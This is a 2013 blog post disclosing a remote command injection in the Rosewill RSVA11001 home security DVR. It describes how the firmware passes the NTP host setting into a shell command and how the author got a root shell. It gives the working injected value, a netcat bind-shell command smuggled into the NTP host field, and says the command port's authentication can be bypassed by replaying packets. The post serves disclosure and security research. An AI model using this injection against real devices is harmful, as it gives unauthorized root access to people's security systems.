Remote Command Injection Vulnerability in Rosewill RSVA11001

The Rosewill RSVA11001 is a home security DVR. I bought one and of course was not content to use it for its original purpose. It's based on a Huawei Hi3515. I downloaded the firmware and with the help of binwalk ripped it apart. The firmware is a confusing mess of different file system types and multiple linux kernels.

I wanted to find a way to get a root shell on the device. Included with the device is a CD with some Windows based monitoring software. Inspection of the firmware revealed an executable hi_dvr that runs on the device and listens on TCP Port 8000 for control commands and on TCP Port 9000 to stream video. Using the strings command on the executable I found this gem

/mnt/ntpdate -q %s > /tmp/tmpfs/ntptmp

So I used the windows management software to set the NTP host to

a;/usr/bin/nc -l -p 5555 -e /bin/sh&

Next I power cycled the box and a shell was waiting a minute later on port 5555. Of course, the hi_dvr executable runs as root so you gain root privilieges with this method. By default it runs this command on startup and once a day thereafter.

As it turns out, the "authentication" done on the command port is just a charade to the user of the management software. Other security researchers had previously identified this. You only need to replay the packets below to exploit the vulnerable shell execution

The box is not very interesting once you are in. It's a linux 2.6.24 kernel with RT patches and busy box user space. I don't have access to the SDK for the Hi3515 (different than Hi3511). The kernel modules for Video Input, Video Output, Audio Output, H264 encoding, etc. are there but in binary only (non stripped) form. You could probably do some cool hacking on this box as it has two SATA ports inside.


Here are the base64 encodings of the packets I captured while conducting the exploit. You'll need to convert them from base64 and replay them with something like nc into a TCP connection to port 8000.

This packet sets the NTP host to the shell escape sequence


This second request to the same port is required to cause the device to save the changes to its flash storage.


Other vulnerable units

The Rosewill RSVA12001 is the same unit with different supplied cameras and should have the same vulnerability.

© Eric Urban 2013